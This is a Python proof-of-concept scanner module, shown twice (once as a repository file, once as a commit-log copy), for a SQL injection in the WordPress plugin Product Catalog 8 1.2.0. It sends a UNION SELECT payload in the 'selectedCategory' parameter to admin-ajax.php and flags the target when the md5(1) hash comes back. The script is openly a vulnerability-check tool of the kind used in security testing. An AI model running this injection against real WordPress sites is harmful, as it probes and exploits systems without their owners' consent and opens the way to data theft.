VulApps/w/wordpress/4/poc.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Generated by ptools
# __Author__ = Anonymous
# _PlugName_ = WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection
# __Refer___ = https://www.exploit-db.com/exploits/40783/

import urllib

def assign(service,arg):
    if service == fingerprint.wordpress:
        return True, arg

def audit(arg):
    target = arg + '/wp-admin/admin-ajax.php'
    post_data = {
        'selectedCategory': '0 UNION SELECT md5(1),2,3,4,5,6',
        'action': 'UpdateCategoryList'

    }
    code, head, body, redirect_url, log = hackhttp.http(
        target, post=urllib.urlencode(post_data))
    if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in body:
        security_hole(target, log=log)


if __name__ == "__main__":
    from dummy import *
    audit(assign(fingerprint.wordpress, 'http://127.0.0.1:8080/')[1])
(Add Vul: WordPress) WordPress Plugin Product Catalog 8 1.2.0 SQL注入漏洞 2016-12-27 10:23:32 +08:00			`#!/usr/bin/env python`
			`# -- coding: utf-8 --`
			`# Generated by ptools`
			`# __Author__ = Anonymous`
			`# _PlugName_ = WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection`
			`# __Refer___ = https://www.exploit-db.com/exploits/40783/`

			`import urllib`

			`def assign(service,arg):`
			`if service == fingerprint.wordpress:`
			`return True, arg`

			`def audit(arg):`
			`target = arg + '/wp-admin/admin-ajax.php'`
			`post_data = {`
			`'selectedCategory': '0 UNION SELECT md5(1),2,3,4,5,6',`
			`'action': 'UpdateCategoryList'`

			`}`
			`code, head, body, redirect_url, log = hackhttp.http(`
			`target, post=urllib.urlencode(post_data))`
			`if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in body:`
			`security_hole(target, log=log)`


			`if __name__ == "__main__":`
			`from dummy import *`
			`audit(assign(fingerprint.wordpress, 'http://127.0.0.1:8080/')[1])`